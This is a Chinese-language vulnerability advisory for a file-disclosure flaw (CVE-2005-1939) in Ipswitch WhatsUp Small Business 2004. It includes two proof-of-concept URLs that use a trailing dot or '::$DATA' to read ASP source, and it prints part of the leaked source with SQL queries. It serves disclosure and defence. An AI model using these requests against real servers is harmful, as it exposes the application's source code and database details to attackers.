Ipswitch Whatsup Small Business 2004文件泄露漏洞
发布日期:2005-09-12
更新日期:2005-09-12
受影响系统:Ipswitch WhatsUp Small Business 2004
描述:
BUGTRAQ ID:
14792,
15291
CVE(CAN) ID:
CVE-2005-1939
WhatsUp Small Business为小型网络提供了一个经济有效的监控和防护方案,可以检查网络结构、监控网络设备,并且具有学习经验的能力。
Ipswitch Whatsup Small Business 2004中存在文件泄漏漏洞,远程攻击者可能利用此漏洞获取脚本的源码。
起因是没有正确的过滤用户输入。远程攻击者可以在扩展名后使用“.”或在“文件名.扩展名”后使用“::$DATA”,浏览所有通过web server发布文件的源码。
<*来源:Dennis Rand (
DER@cowi.dk)
链接:
http://www.cirt.dk/advisories/cirt-36-advisory.pdf
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://192.168.1.10:8022/SOHO/reports/GroupDeviceHealth.asp.
http://192.168.1.10:8022/SOHO/reports/GroupDeviceHealth.asp::$data
<%@ language="jscript" %>
<!--#include file="..\utility\Sql.inc"-->
<!--#include file="..\utility\SohoSettings.inc"-->
<%
var nMaxDeviceCount = GetSohoMaxDeviceCount();
//var oRs = ExecSQL(
// "SELECT nDeviceID, sDisplayName "+
// "FROM Device");
var nDeviceGroupID = Request.QueryString("nDeviceGroupID");
nDeviceGroupID=0;
var oRs = ExecSQL(
"SELECT Device.nDeviceID, sNetworkName, sNetworkAddress, "+
"sMonitorTypeName, PivotActiveMonitorTypeToDevice.nPivotActiveMonitorTypeToDeviceID, nStateFillColor, "+
"nInternalMonitorState, nInternalStateTime, MonitorState.nMonitorStateID, nWorstStateID,nDeviceTypeID "+
"FROM PivotActiveMonitorTypeToDevice "+
建议:
厂商补丁:
Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ipswitch.com/浏览次数:2980
严重程度:0(网友投票)
